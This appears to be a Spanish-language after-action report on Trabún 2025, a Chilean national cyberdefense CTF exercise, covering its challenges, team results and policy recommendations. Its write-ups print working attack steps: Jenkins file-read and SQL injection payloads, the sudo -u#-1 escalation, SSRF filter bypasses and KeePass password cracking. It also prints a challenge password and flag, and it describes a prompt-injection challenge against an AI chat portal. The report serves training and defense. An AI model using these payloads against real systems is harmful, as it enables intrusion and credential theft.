

Trabún 2025 fue un ejercicio nacional de ciberdefensa tipo STX (Ejercicio Situacional Cibernético con Score tipo CTF) diseñado para evaluar y fortalecer las capacidades técnicas de equipos de respuesta a incidentes y ciberseguridad de Chile.
El ejercicio simuló escenarios realistas de compromiso de infraestructuras críticas, incluyendo sistemas SCADA, portales gubernamentales, pipelines DevSecOps y sistemas de comando y contro, entre otros.
Propósito: Consolidar la preparación nacional de ciberdefensa mediante un ejercicio multidominio con presión operativa realista, replicando TTPs históricos de APT y afectación coordinada de IT/OT/espacio-ciber/información
Participantes: equipos interinstitucionales (FF.AA., sector público, sector privado), conformaciones blue/purple con células rojas controladas (instructors) Metodología STTX: gestión integral del incidente, coordinación interagencias y decisiones estratégicas Metodología CTF Jeopardy: explotación web, DFIR, pwn, reversing, crypto, OSINT/GEOINT, APT chaining
Un adversario con avanzadas capacidades ofensivas en ciberespacio, guerra electrónica (EW) e influencia busca degradar la red eléctrica operativa (REO), desorganizar el comando y control (C2), y desinformar a la población, forzando la activación del Protocolo TRABÚN. Este escenario simula un ataque coordinado de alta complejidad contra infraestructura crítica nacional, demandando una respuesta inmediata y una colaboración interinstitucional robusta y eficiente.
Trabún 2025 se estructuró en torno a objetivos clave, alineados con estándares internacionales y marcos de ciberseguridad, para garantizar una evaluación completa y relevante de las capacidades de los participantes.
Representando instituciones de defensa y seguridad nacional
Especialistas en ciberseguridad y respuesta a incidentes
Desafíos técnicos multidisciplinarios
71.7% de tasa de resolución exitosa
La distribución de dificultad refleja un diseño pedagógico balanceado, permitiendo a equipos con diferentes niveles de madurez técnica participar efectivamente mientras se presentan desafíos avanzados para expertos.
El evento Trabún 2025 presentó un amplio espectro de desafíos técnicos, cubriendo las competencias esenciales para la defensa de infraestructuras críticas modernas. Algunas de las áreas clave incluyen:
Seguridad de aplicaciones web y operaciones de desarrollo seguras.
Análisis de incidentes y recuperación de datos digitales.
Protección de la información mediante técnicas de cifrado y descifrado.
Seguridad y monitoreo de redes y comunicaciones.
Bienvenida y Capability Forge: 15 desafíos de nivel fácil para calibrar capacidades básicas de los equipos. Foco en fundamentos técnicos y reconocimiento del entorno.
Intrusión y Operaciones Multidominio: Liberación de 15 desafíos vinculados al escenario "Colapso de Monture". Simulación de compromiso inicial y movimiento lateral en infraestructuras críticas.
Evento Especial: Liberación del reto "Ex-Defacer Chileno", desafío continuo que permaneció activo durante todo el ejercicio.
Desactivación de Capability Forge. Los equipos concentran esfuerzos en escenarios de día 1 y preparan estrategias para la escalada del día 2.
Escalada Silenciosa: Liberación de 12 desafíos adicionales (4 fácil, 4 medio, 4 difícil) representando técnicas avanzadas de persistencia y exfiltración.
Capability Forge fue diseñado como un módulo de calibración técnica que permitió a los equipos demostrar competencias fundamentales antes de enfrentar escenarios complejos de compromiso.
Los 15 desafíos de nivel fácil cubrieron habilidades básicas en múltiples dominios: OSINT, criptografía elemental, análisis web, forense inicial y scripting.
Nota técnica: Capability Forge fue desactivado en la mañana del día 2 para concentrar recursos en los escenarios de mayor complejidad técnica y realismo operacional.
Si bien eran retos de dificultad fácil, no todos los equipos los resolvieron , retos de esteganografía, blockchain, web , fueron resueltos por pocos participantes

Se observo bajo rendimiento en los equipos de CSIRT FACH, SSFFAA, CARAB, EJERCITO y Armada
Trabún 2025 incluyó 4 eventos especiales diseñados para poner a prueba la toma de decisiones estratégicas de los equipos en escenarios de alta presión y relevancia. Estos desafíos trascendieron lo técnico, enfocándose en la gestión, comunicación y atribución en crisis de ciberseguridad.
Desafío enfocado en identificar el origen de un ciberataque y gestionar sus implicaciones geopolíticas. Un ejercicio crítico para la diplomacia y la seguridad nacional.
Puso a prueba la capacidad de los equipos para gestionar la narrativa pública durante un incidente, manteniendo la calma y la credibilidad bajo escrutinio mediático.
Simulación de un incidente que afectaba servicios críticos, exigiendo decisiones rápidas para asegurar la resiliencia y el restablecimiento operacional.
Los equipos enfrentaron dilemas sobre la legalidad de sus acciones y el cumplimiento normativo en situaciones de ciberdefensa compleja.
La mayoría de estos desafíos fueron resueltos por los equipos, demostrando una sólida capacidad estratégica. Sin embargo, el Evento de Atribución Estratégica no fue resuelto por el equipo CSIRT FACH, y la Evaluación Legal tampoco fue resuelto por el equipo de CSIRT FACH.
Trabún 2025 incluyó 4 eventos especiales diseñados para poner a prueba la toma de decisiones estratégicas de los equipos en escenarios de alta presión y relevancia. Estos desafíos trascendieron lo técnico, enfocándose en la gestión, comunicación y atribución en crisis de ciberseguridad.

La mayoría de estos desafíos fueron resueltos por los equipos, demostrando una sólida capacidad estratégica. Sin embargo, el Evento de Atribución Estratégica no fue resuelto por el equipo CSIRT FACH, y la Evaluación Legal tampoco fue resuelto por el equipo de CSIRT FACH.
El escenario "Colapso de Monture" simuló un ataque coordinado contra infraestructuras críticas nacionales, incluyendo sistemas SCADA, portales gubernamentales, pipelines de desarrollo y sistemas de comando y control militar.
Demostrar cadenas de ataque realistas contra infraestructuras críticas, desde reconocimiento inicial hasta control de sistemas operacionales.
Evaluar capacidades de detección, análisis y respuesta ante compromisos multietapa.
El escenario "Escalada Silenciosa" representó la fase de persistencia y exfiltración avanzada de un atacante que ya ha establecido presencia en la red objetivo. Los 12 desafíos simularon técnicas sofisticadas de ofuscación, canales encubiertos, análisis forense avanzado y explotación de vulnerabilidades complejas.
Comunicación C2 mediante bits reservados TCP, identificadores personalizados y técnicas de esteganografía avanzada.
Técnicas de evasión mediante ofuscación XOR, ransomware simulado y backdoors en sistemas críticos.
Recovery de artefactos fragmentados, decodificación de señales telecom y análisis de tráfico cifrado.
La distribución equilibrada de dificultad (4 fácil, 4 medio, 4 difícil) permitió que equipos con diferentes niveles de madurez encontraran desafíos apropiados mientras se presentaban escenarios realistas de amenazas persistentes avanzadas (APT).
Portal Drupal vulnerable a Drupalgeddon (CVE-2018-7600), permitiendo ejecución remota de código (RCE). Los equipos debían explotar la vulnerabilidad de manera controlada para obtener acceso inicial al sistema comprometido.
Dificultad: Media
Entorno entregado: Instancia Drupal vulnerable en red aislada con credenciales limitadas.


NIST CSF:
MITRE ATT&CK:
Mejora significativa en gestión de activos digitales gubernamentales y capacidades de parcheo automatizado. Fortalece CSIRT nacional en respuesta rápida a vulnerabilidades críticas, reduciendo tiempo medio de remediación (MTTR) de semanas a horas.
Recomendación de Política: Crear playbooks nacionales de respuesta a vulnerabilidades críticas en CMS, con ejercicios trimestrales de red-team contra portales gubernamentales. Implementar campañas formativas obligatorias para administradores web del sector público.
Portal web con chat de inteligencia artificial personalizado que presentaba fallo lógico explotable mediante prompt injection. La validación insuficiente de entrada permitía manipular el modelo para exfiltrar datos sensibles del contexto o ejecutar acciones no autorizadas.
Los equipos debían identificar el modelo de IA subyacente y desarrollar prompts adversariales que:

PR.DS — Data Security: protección de información en procesamiento por modelos
DE.CM — Continuous Monitoring: detección de patrones de prompt injection
PR.IP — Procedimientos seguros de adquisición y configuración de modelos IA
Desarrollo de competencias en gobernanza de IA aplicada a infraestructuras críticas. Preparación de marcos de certificación y uso responsable de IA en servicios públicos chilenos.
Se entregó imagen conteniendo nombre de documento corporativo. Los equipos debían localizar el documento en repositorios públicos (GitHub, GitLab, etc.), extraer metadatos relevantes y obtener la flag en información de la compañía.
Tiempo promedio: 15-30 minutos
El éxito en este reto demuestra una sólida base de capacidades OSINT en los equipos participantes, fundamental para fases de reconocimiento en operaciones de ciberseguridad defensiva y ofensiva.

Fugas accidentales en repositorios públicos exponen credenciales, configuraciones, secretos API y arquitecturas internas. Atacantes las usan para compromiso inicial de bajo costo.
DE.CM — Detección de anomalías e información expuesta
ID.AM — Identificación y gestión de activos de información
Mayor conciencia sobre fugas accidentales en repositorios de código gubernamental. Mejora significativa en capacidades de búsqueda e inteligencia de equipos forenses y legales. Fortalecimiento de OSINT como disciplina estratégica en CSIRT nacional.
Formación: Talleres OSINT avanzado para analistas de inteligencia y respuesta a incidentes.
Técnico: Implementar campañas de hardening de repositorios institucionales con herramientas DLP automatizadas.
Política: Normativa de gestión de código fuente para entidades públicas con auditorías periódicas.
Los equipos recibieron imagen térmica de un teclado. Objetivo: identificar las teclas pulsadas recientemente mediante análisis de degradación térmica y deducir la contraseña correcta.
Técnica: Side-channel attack basado en calor residual. Requiere análisis visual, comprensión de física térmica y generación de permutaciones de contraseñas probables.
NIST CSF:
MITRE ATT&CK:


Cámaras térmicas capturan residuo de calor en teclados por 30-60 segundos post-escritura. Atacante con acceso físico breve puede extraer contraseñas.
MFA obligatorio, teclados desechables en puestos críticos, protectores térmicos, políticas de limpieza de puesto, entrenamiento en higiene de seguridad física.
Fortalecimiento de prácticas OPSEC en instituciones públicas y fuerzas armadas. Adopción acelerada de MFA/PKI en accesos críticos.
"Este caso demuestra que la debilidad no es solo digital: la higiene física del puesto de trabajo y autenticación multifactor son esenciales para protección integral."
Recomendación de Política: Obligatoriedad de autenticación multifactor (MFA) para todos los accesos a sistemas sensibles del Estado. Formación OPSEC para funcionarios con acceso a información clasificada, incluyendo protocolos de protección física del puesto de trabajo.
Se entregó sistema SCADA simulado protegido en archivo ZIP con contraseña. Los equipos debían:
Tasa de resolución: 10/10 equipos (100%)
Importancia crítica: Simula compromiso de infraestructuras industriales reales (energía, agua, manufactura).

Aislamiento de redes operacionales mediante firewalls industriales, VLANs dedicadas y DMZs. Protocolo: zero-trust entre zonas.
Configuración segura de HMI/PLC, deshabilitación de servicios innecesarios, actualización de firmware con procedimientos de rollback.
Vaults para secretos OT, rotación automática, MFA para accesos remotos, eliminación de credenciales por defecto.
IDS/IPS industriales, monitoreo de comportamiento de controladores, backups offline, playbooks de respuesta OT-específicos.
NIST Functions:
MITRE ATT&CK ICS: TA0101 (Initial Access variants), credential theft, lateral movement en OT
Beneficios: Incremento significativo en capacidad de proteger redes de infraestructura crítica nacional (energía, agua, puertos, manufactura).
Recomendación: Crear programa nacional de certificación OT Security para equipos especializados. Ejercicios conjuntos industria-gobierno-academia con foco en escenarios de compromiso ICS.
Resumen Operativo
Entorno Jenkins vulnerable a CVE-2024-23897, permitiendo lectura arbitraria de archivos del sistema. El reto incluía ruido intencional (distracciones) para simular entornos reales complejos.
Equipos exitosos: 4/10
Vector: Arbitrary file read mediante command-line interface, permitiendo acceso a secretos, configuraciones y código fuente.


java -jar jenkins-cli.jar -s http://IP:8080/ -http help 1 "@/proc/self/environ"
El payload utiliza el símbolo @ para leer archivos del sistema.
El contenido del archivo aparece en el campo de error de la respuesta.

Disminución significativa del riesgo en desarrollo de software crítico gubernamental. Mejora de prácticas DevSecOps y gestión de secretos en entidades estatales. Fortalecimiento de la cadena de suministro de software.
Mapeo NIST CSF: PR.IP (Configuration Management), PR.DS (Data Security) | MITRE ATT&CK: T1210 (Exploitation of CI/CD), T1078 (Valid Accounts)
Recomendación Estratégica: Obligatoriedad de vaults para gestión de secretos en todos los pipelines CI/CD estatales. Implementación de revisiones automatizadas de seguridad (SAST/DAST) en pipelines de desarrollo gubernamental.
Portal web con vulnerabilidad de inyección SQL en campo "tags". La explotación requería técnica avanzada: UNION SELECT con alineación de 8 columnas.
Tasa de resolución: 0/10 equipos
Complejidad: SQLi no trivial que exige:
La ausencia de resolución indica brecha formativa en técnicas avanzadas de explotación web. Equipos demostraron competencia en SQLi básico pero requieren desarrollo en:
Payload: %')--
Suprime el final de la consulta y elimina errores de sintaxis.
Payload: %') UNION SELECT 'A','','','','','','',''--
Se descubren 8 columnas necesarias para el UNION.
Payload: %') UNION SELECT 0,name,'1970-01-01','3','4','5','[]','7' FROM sqlite_master--
Aparece la tabla "user" en los resultados.
Payload final exitoso:
/search?recipe_name=&description=&tags=breakfast"%27)+Union+Select+1,password,%272012-10-10%27,%27d%27,username,%27f%27,%27[]%27,7+from+user--
Este payload permite volcar usuarios y contraseñas de la tabla user, revelando la flag en texto claro.

El back-end concatena "tags" dentro de LIKE '%%') antes de parametrizar, permitiendo romper la cadena.
Flask corre en modo debug, revelando trazas de errores de sintaxis SQL rápidamente.
Con el número correcto de columnas se puede retornar cualquier dato de la base SQLite.
Las contraseñas y flags están almacenadas sin cifrado en la base de datos.
PR.MA — Maintenance: gestión de actualizaciones y parches
PR.IP — Configuration: validación de entradas, queries parametrizadas
DE.CM — Monitoring: detección de patrones SQLi
Inversión en formación avanzada de pruebas de penetración web. Mayor cobertura de herramientas SAST en aplicaciones críticas gubernamentales. Desarrollo de competencias especializadas en seguridad de aplicaciones.
Formación: Cursos especializados en Web Application Penetration Testing (nivel avanzado como el de Q-hunter).
Técnico: Adopción de políticas de code review obligatorias y DAST continuo.
Proceso: Implementar Security Champions en equipos de desarrollo.
Entorno con versión vulnerable de sudo que permite bypass de restricciones mediante UID -1, resultando en ejecución como root.
Equipos exitosos: 6/10
Técnica:
sudo -u#-1 commandEl sistema interpreta UID -1 (0xFFFFFFFF) como UID 0 (root), permitiendo escalada de privilegios completa.
CVE-2019-14287 afecta configuraciones sudo donde se permite "ALL" excepto root. Explotable cuando usuario tiene permisos sudo con restricciones basadas en usuario.


Gestión centralizada de parches críticos con implementación automatizada en 24-48 horas post-divulgación.
Principio de mínimo privilegio: usuarios obtienen solo permisos estrictamente necesarios, revisables y auditables.
Auditoría de archivos sudoers, eliminación de wildcards peligrosos, logging exhaustivo de comandos sudo.
EDR con detección de escalada de privilegios, alertas automáticas ante comandos sudo sospechosos.
NIST CSF:
MITRE ATT&CK: T1548.003 (Sudo and Sudo Caching)
Para Chile: Mejora significativa en prácticas de hardening de servidores críticos y gestión de privilegios en sistemas gubernamentales.
Acción: Implementar gestión centralizada de parches con SLA definidos. Auditoría trimestral de configuraciones sudoers en sistemas estatales.
Un total de 7 equipos lograron resolver este complejo enigma, incluyendo COMDCIBER, CSIRT DN-1, DN-2, DN-3, CSIRT EJÉRCITO y CYBER PDI y CSIRT Armada

En este desafío, los equipos se enfrentaron a un archivo PCAP con un número limitado de paquetes. Los payloads de estos paquetes estaban ofuscados y requirieron reordenamiento y la aplicación de una operación XOR para decodificar la información crítica.
Un total de 7 equipos lograron resolver este complejo enigma, incluyendo COMDCIBER, CSIRT DN-1, DN-2, DN-3, CSIRT EJÉRCITO y CYBER PDI y CSIRT Armada
Demostró la crítica necesidad de habilidades avanzadas en network forensics y manipulación de tráfico ofuscado.
DE.CM — Detección: Monitorización Continua
RS.AN — Respuesta: Análisis
Fortalece las capacidades de los CERT y equipos CSIRT en análisis de incidentes de red con técnicas evasivas.
Implementar talleres de packet analysis y crear playbooks para casos de ofuscación de tráfico.
Este evento simuló un ataque complejo que combinó la inteligencia de fuentes abiertas (OSINT) para obtener credenciales, seguido de una intrusión en un sistema de radares y su compromiso mediante inyección de comandos (bash injection).
Los equipos debían utilizar técnicas OSINT para localizar credenciales expuestas en plataformas como Pastebin. Una vez obtenidas, accedían al sistema de radares y explotaban una vulnerabilidad de inyección de comandos (bash injection) para lograr control. El desafío fue superado por 3 de 10 equipos
Este escenario destacó la crítica necesidad de proteger la información sensible desde su origen hasta su uso en sistemas operativos.
ID.RA — Risk Assessment
PR.PT — Platform Protection
DE.CM — Continuous Monitoring
Initial Access: T1078 (Valid Accounts)
Execution: T1059 (Command and Scripting Interpreter) - Bash
Impact: T1498 (Denial of Service - External Targets)
Mejora significativa en la protección de sistemas de vigilancia y fortalece las capacidades ofensivas/defensivas combinadas de OSINT + Ciberseguridad.
Recomendación: Implementar políticas estrictas de gestión de credenciales, auditorías de exposición OSINT y segmentación de redes para sistemas de comando y control.
Recomendación: Implementar políticas estrictas de gestión de credenciales, auditorías de exposición OSINT y segmentación de redes para sistemas de comando y control.

Los equipos enfrentaron un portal de control de drones vulnerable a Server-Side Template Injection (SSTI). La particularidad era una doble capa de escape para las llaves, la cual podía ser evadida insertando un espacio dentro de la sintaxis {{ }}, permitiendo evaluar expresiones arbitrarias.
{{ <expression> }}A pesar de la técnica disponible, ningún equipo logró resolver este desafío, evidenciando la complejidad y la falta de familiaridad con este tipo de vulnerabilidad avanzada.
La explotación de plantillas es un riesgo crítico para sistemas de generación dinámica de contenido, especialmente en infraestructuras sensibles como el control de drones.
NIST CSF:
OWASP:
Para Chile: Desarrollo de guías y checklists detalladas para desarrolladores sobre el uso seguro de motores de plantillas (Jinja, Twig, etc.).
Recomendación: Implementar formación DevSecOps especializada con enfoque en la seguridad y explotación de plantillas y la generación de contenido dinámico.
Este desafío presentó a los equipos un volcado de memoria (memory dump) que contenía un vault de KeePass vulnerable (CVE-2023-32784).
keepass dump extractor y keepass2john.Esta primera parte fue crucial, ya que el éxito desbloqueaba el acceso al siguiente segmento del reto, permitiendo a varios equipos progresar.
Con las credenciales recuperadas de KeePass, los equipos debían explotar una vulnerabilidad de Server-Side Template Injection (SSTI) en un portal de control satelital simulado. Las credenciales permitieron un acceso inicial, pero la inyección SQL fue la técnica para la explotación final.
Este escenario puso a prueba la capacidad de los participantes para encadenar vulnerabilidades y explotar sistemas con información sensible.
Demuestra la capacidad de realizar forense de memoria y recuperar secretos críticos, además de explotar vulnerabilidades web en sistemas interconectados. Es vital para la respuesta a incidentes complejos.
NIST CSF:
Mejora significativa en la respuesta a incidentes que involucran forense de memoria y explotación web, así como la gestión segura de vaults de credenciales.
Implementar capacitaciones avanzadas en forense de memoria y fomentar el uso controlado y seguro de vaults empresariales, incluyendo auditorías periódicas de configuraciones.
Esta vulnerabilidad permite extraer la contraseña maestra de la memoria del proceso.
Tras investigar el CVE, se identifica la herramienta keepass-dump-extractor disponible en GitHub:
Esta herramienta permite aprovechar la vulnerabilidad para recuperar información de la contraseña.
Una vez descargada la herramienta, es fundamental leer la documentación para comprender su funcionamiento y generar correctamente la wordlist de posibles combinaciones.
El software analiza el volcado de memoria y extrae caracteres potenciales de la contraseña maestra, generando múltiples combinaciones posibles.

Combinaciones posibles extraídas del dump
Extracción del hash del archivo KeePass
Cracking del hash con la wordlist
Utilizando keepass2john se obtiene el hash del archivo, que luego se procesa con John the Ripper o Hashcat.

Tras completar el proceso de cracking, se obtiene exitosamente la contraseña maestra del contenedor KeePass.

Al abrir el contenedor se revelan numerosas entradas organizadas en diferentes grupos.


El contenedor contiene múltiples señuelos diseñados para confundir al investigador. Hay dos grupos principales: flag y red country.
Contiene varias flags falsas y elementos de distracción diseñados para desviar la atención.

Similar al anterior, presenta información engañosa y pistas falsas.

Al revisar el historial de la entrada, se encuentran varias modificaciones. La versión más reciente contiene la flag real.



QM{C0ngr4tsy0ul3arns0meth1ng1!@}
Usuario: Commander
Contraseña: 5xMstI1eFehWEQV1J0ei
Ubicados en el grupo "satellite" con icono de pingüino
Los equipos se enfrentaron a un escenario complejo que involucraba un archivo PCAP con información oculta en los bits reservados del encabezado TCP (3 bits). Este reto requería no solo la extracción de los datos utilizando herramientas como tshark, sino también su posterior decodificación.
A pesar de la sofisticación de la técnica, ningún equipo logró resolver este desafío, lo que subraya la dificultad y la novedad de estas técnicas de comunicación encubierta.
Este evento demostró un riesgo avanzado de exfiltración de información a través de canales encubiertos que utilizan campos de protocolos legítimos. Este tipo de amenaza es difícil de detectar con herramientas de seguridad tradicionales y representa un vector crítico para el espionaje y la fuga de datos sensibles.
La inversión en la detección avanzada de canales encubiertos es crucial para la seguridad de las redes gubernamentales y de infraestructura crítica, protegiéndolas contra técnicas de exfiltración de última generación.
Adquirir equipamiento con capacidades DPI avanzadas y desarrollar un programa de entrenamiento especializado en análisis de tráfico encubierto para equipos de seguridad.
Los bits reservados deben ir en 000 según especificación
Deben ignorarse, aunque vengan con cualquier valor
Nadie legítimamente debería usarlos para transmitir datos
Si Wireshark muestra valores como:
Ya es una anomalía significativa

Los paquetes de la IP 10.0.0.2 hacia 10.0.0.3 contienen estos bits reservados con valores específicos
Cada paquete transporta información oculta en los 3 bits reservados del header TCP
tshark -r file.pcap -Y "ip.src==10.0.0.2 && ip.dst==10.0.0.3 && tcp" -V | awk '/Reserved:/{ if (match($0,/([01]{3})./,a)) print a[1]; }' > reserved3bits.txtExtrae solo comunicaciones de 10.0.0.2 a 10.0.0.3
Obtiene los valores numéricos de los bits reservados
Guarda los resultados en reserved3bits.txt

python3 - << 'PY'
bits = ''
with open('reserved3bits.txt') as f:
for s in f:
s = s.strip()
if s:
bits += s[-3:]
out = ''.join(
chr(int(bits[i:i+8], 2))
for i in range(0, len(bits), 8)
if len(bits[i:i+8]) == 8
)
print(out.rstrip('\x00'))
PY
Este desafío exigió a los equipos analizar un archivo PCAP para identificar paquetes con un identificador específico (0xb00b). Una vez localizados, debían extraer el contenido hexadecimal, eliminar los bytes nulos (0x00) intercalados y, finalmente, aplicar una operación XOR con una clave de 1 byte para revelar la información oculta.
La combinación de estas técnicas de ofuscación resultó ser un obstáculo significativo, y al igual que el evento anterior, ningún equipo logró resolver completamente este desafío durante el ejercicio.
El evento destacó la prevalencia y efectividad de las técnicas de ofuscación simples, utilizadas comúnmente en malware ligero o en canales de comunicación encubiertos. La dificultad para detectar y decodificar estos datos subraya una brecha crítica en las capacidades de análisis forense y la necesidad de herramientas y metodologías más robustas.
Refuerza la necesidad de una automatización forense avanzada para la detección y análisis rápido de técnicas de ofuscación. Esto es crucial para proteger información sensible y responder eficazmente a amenazas de ciberespionaje.
Implementar un programa de formación de desarrollo de scripts y plantillas de decodificación. Fomentar la creación de una base de conocimiento de técnicas de ofuscación y sus contramedidas.
Este desafío multidisciplinario requería que los equipos realizaran una serie de pasos complejos para recuperar información oculta. Primero, debían reparar una imagen JPG corrupta. Una vez restaurada, se esperaba el uso de Steghide para extraer un archivo S3cr3t.txt incrustado. El contenido de este archivo, una mezcla de Base64 y ruido hexadecimal, presentaba una última capa de ofuscación. La tarea final consistía en detectar un patrón en los datos y aplicar una operación XOR repetitiva con la clave correcta para revelar el flag final.
Este evento fue diseñado para simular escenarios de exfiltración de información altamente sofisticados, donde múltiples técnicas de ocultamiento (esteganografía, cifrado y ofuscación de datos) se combinan para evadir la detección. Su resolución demanda una comprensión profunda de las herramientas forenses y la capacidad de pensar "fuera de la caja" para desentrañar capas de engaño, reflejando desafíos del mundo real en la inteligencia de amenazas y la respuesta a incidentes.
Fortalece drásticamente la capacidad del país en el análisis de evidencias digitales complejas, especialmente en la identificación y recuperación de información oculta en operaciones de espionaje o ciberdelincuencia que utilizan técnicas avanzadas de esteganografía y criptografía en archivos multimedia.
Establecer cursos de formación avanzada en forense multimedia para CSIRTs y unidades de ciberseguridad. Fomentar el desarrollo y la compartición de librerías de scripts y herramientas entre organismos para automatizar la detección y extracción de esteganografía.
Este evento presentó un escenario con Jenkins vulnerable a RCE (Ejecución Remota de Código) mediante CVE-2018-1000861. Los equipos debían explotar esta vulnerabilidad para exfiltrar una "flag", ya sea publicándola en el área userContent de Jenkins o enviándola a un servidor externo utilizando un payload Groovy específico. Varios equipos lograron resolverlo, demostrando la capacidad de identificar y explotar fallos en el proceso de integración continua.
El desafío resalta cómo las configuraciones inseguras en los pipelines de CI/CD pueden convertirse en un vector crítico para la exfiltración de datos. La capacidad de un atacante para ejecutar código en un servidor de integración continua significa que tiene acceso a secretos, código fuente y la capacidad de manipular despliegues, poniendo en riesgo toda la cadena de suministro de software.
Capacitar a los equipos en la protección de CI/CD es fundamental para prevenir fugas de información crítica y garantizar la integridad del software desarrollado, especialmente en sectores estratégicos.
Establecer políticas nacionales y guías de endurecimiento para la gestión segura de pipelines de CI/CD en todas las entidades gubernamentales y de infraestructura crítica.

Este desafío abordó un escenario donde un portal web potenciado por Inteligencia Artificial era vulnerable a ataques de inyección de prompts (prompt injection). Los equipos debían explotar esta vulnerabilidad para manipular el comportamiento del modelo de IA, logrando potencialmente la exfiltración de información sensible o el control no autorizado de funciones. Este evento fue resuelto con éxito por 8 equipos, demostrando la creciente conciencia y capacidad para manejar riesgos de IA. Los equipos que lograron resolverlo fueron:
8/10
El desafío subraya los serios riesgos de seguridad inherentes a los servicios de IA expuestos al público, especialmente la vulnerabilidad a la exfiltración de datos a través de la manipulación del modelo. A medida que más servicios gubernamentales y críticos adoptan la IA, comprender y mitigar el "prompt injection" se vuelve fundamental para proteger la información confidencial y mantener la integridad operativa.
Genera una conciencia estratégica crítica sobre la importancia de la gobernanza de IA y la seguridad en el desarrollo y despliegue de servicios basados en IA en el sector público, asegurando la confianza y la protección de datos.
Elaborar y adoptar una normativa nacional exhaustiva sobre el desarrollo y la implementación segura de la Inteligencia Artificial en todas las infraestructuras críticas y servicios gubernamentales.
Este evento simuló un ataque de ransomware en el que 11 archivos fueron cifrados mediante un algoritmo XOR repetitivo, utilizando una clave de 16 bytes. Los equipos recibieron un archivo PCAP (captura de tráfico de red) y una nota de rescate, lo que implicaba la necesidad de realizar un known-plaintext attack para intentar recuperar la clave y descifrar los archivos. A pesar de los recursos proporcionados, el desafío no fue resuelto, destacando la complejidad y la presión que implican los incidentes reales de ransomware.
La simulación de un incidente de ransomware como este es crucial para entender las dinámicas de un ataque real, incluyendo la exfiltración de datos y la comunicación C2 (Comando y Control) asociada. La incapacidad de resolverlo en tiempo real subraya la necesidad de una preparación avanzada y herramientas específicas para la respuesta a incidentes de cifrado malicioso, especialmente en entornos críticos donde la recuperación rápida de la información es vital.
Incrementa la resiliencia nacional y la capacidad de recuperación ante incidentes críticos de ciberseguridad, especialmente para las instituciones chilenas que gestionan información sensible o infraestructura esencial.
Establecer planes nacionales de backup obligatorios y realizar ejercicios tabletop periódicos de respuesta a ransomware para todos los sectores críticos.
Este desafío técnico consistió en recuperar y ensamblar tres imágenes digitales que habían sido fragmentadas en bloques de 1024 bytes. La complejidad radicó en que los archivos poseían un encabezado mal etiquetado, requiriendo que los participantes repararan manualmente ciertos bytes para corregir la estructura del archivo y luego concatenaran correctamente los bloques. Este ejercicio puso a prueba la habilidad de los equipos para reconstruir datos dañados y fragmentados.
La capacidad de realizar file carving y la recuperación de artefactos es una habilidad forense digital crítica. En escenarios de ciberseguridad, a menudo es necesario recuperar evidencia de dispositivos dañados, particiones borradas o sistemas comprometidos donde los archivos están fragmentados o tienen metadatos corruptos. Este evento simula esas condiciones, fortaleciendo la habilidad de los analistas para extraer información vital en investigaciones criminales o incidentes de seguridad.
Fortalece las capacidades forenses digitales del país, cruciales para la investigación de ciberataques, la lucha contra el cibercrimen y la recopilación de inteligencia, asegurando la validez de la evidencia en procesos judiciales.
Mejorar los laboratorios forenses con equipos y software especializados, y realizar entrenamientos periódicos con casos reales de fragmentación y corrupción de datos para mantener la pericia técnica del personal.
Este desafío técnico, no resuelto por ningún equipo, se presentó con un archivo sin extensión que requería un análisis forense binario profundo. Los participantes debían reparar manualmente el encabezado del archivo, específicamente los bytes iniciales, para que coincidieran con la estructura estándar de un archivo WAV (52 49 46 46 ?? ?? ?? ?? 57 41 56 45). Una vez reparado y con la extensión .wav añadida, el archivo revelaba una serie de pitidos que, a pesar de parecer Morse, ocultaban un mensaje codificado con minimodem, requiriendo el comando minimodem --rx 1200 -f reversedfile.wav para su decodificación.
La combinación de forense binaria y decodificación de comunicaciones históricas y modernas (como Morse y minimodem) es crucial para las capacidades de inteligencia y análisis en ciberseguridad. Este evento simula la necesidad de analizar datos en formatos no estándar o corruptos, y de identificar y decodificar canales de comunicación encubiertos que pueden ser utilizados para exfiltración de información o comando y control en ataques sofisticados. Es una habilidad vital para la recuperación de inteligencia en escenarios de incidentes avanzados.
Con minimodem instalado correctamente, se procede a decodificar el archivo de audio utilizando el siguiente comando en la terminal:
minimodem --rx 1200 -f reversedfile.wav
Desarrolla capacidades avanzadas en análisis de señales y telecomunicaciones forenses, esenciales para la identificación y mitigación de amenazas que utilizan métodos de comunicación no convencionales, fortaleciendo la inteligencia y contrainteligencia cibernética nacional.
Incluir módulos especializados en forense de telecomunicaciones y análisis de señales en los programas de formación de expertos en ciberseguridad y fuerzas de orden público, fomentando la pericia en técnicas avanzadas de descifrado y recuperación de información.
Este reto técnico, que no fue resuelto por ningún equipo, se centró en la ingeniería inversa de un ejecutable ELF 64-bit PIE (Position Independent Executable). El binario ocultaba un array cifrado de 46 bytes que debía ser descifrado usando una clave sugerida por la cadena "satellite_key_2025" encontrada con strings.
La tarea requería el análisis forense del binario para identificar patrones anómalos, preferiblemente con xxd para un volcado hexadecimal. El objetivo final era la extracción de credenciales (operador y analista) mediante la reversión del algoritmo de cifrado XOR y la creación de un script de descifrado, un proceso que simula la recuperación de información crítica de software malicioso o sistemas comprometidos.
Refuerza las habilidades de ingeniería inversa en el país, lo que es vital para la detección, análisis y atribución de malware binario, contribuyendo a una mejor comprensión de las tácticas de los adversarios y a una respuesta más efectiva a los ciberataques.
Implementar cursos avanzados de ingeniería inversa en programas de capacitación para equipos CERT y CISRT, así como en universidades, para cultivar expertos capaces de desentrañar las complejidades de binarios maliciosos.
Este evento simuló la explotación de un portal de administración con un puerto crítico (5000) expuesto internamente. Los participantes debían primero identificar una vulnerabilidad de SQL Injection utilizando una técnica clásica (' OR 1=1 --) para obtener acceso inicial. Luego, el desafío escalaba a una vulnerabilidad de SSRF (Server-Side Request Forgery), requiriendo la evasión de filtros mediante la notación hexadecimal de direcciones IP (0x7f000001:5000). El ejercicio fue exitosamente resuelto por 3 equipos: CSIRT DN-1, CSIRT DN-2 y CYBER PDI, demostrando su habilidad para encadenar exploits y evadir medidas de seguridad.
Este ejercicio es fundamental para comprender la seriedad de los vectores de ataque SSRF y las técnicas de bypass de filtrado a través de codificación (como la notación IP en hexadecimal). Demuestra cómo atacantes sofisticados pueden explotar la falta de validación de URLs y configuraciones laxas para acceder a servicios internos, exfiltrar datos o pivotar hacia otros sistemas. Dominar la detección y mitigación de SSRF es crucial para proteger la infraestructura interna y prevenir brechas de seguridad significativas.
El dominio de estas mitigaciones promueve el desarrollo de políticas de seguridad robustas para APIs internas y fomenta la formación especializada en técnicas de bypass de filtros. Esto eleva la capacidad nacional para defenderse contra ataques de cadena y proteger sistemas críticos.
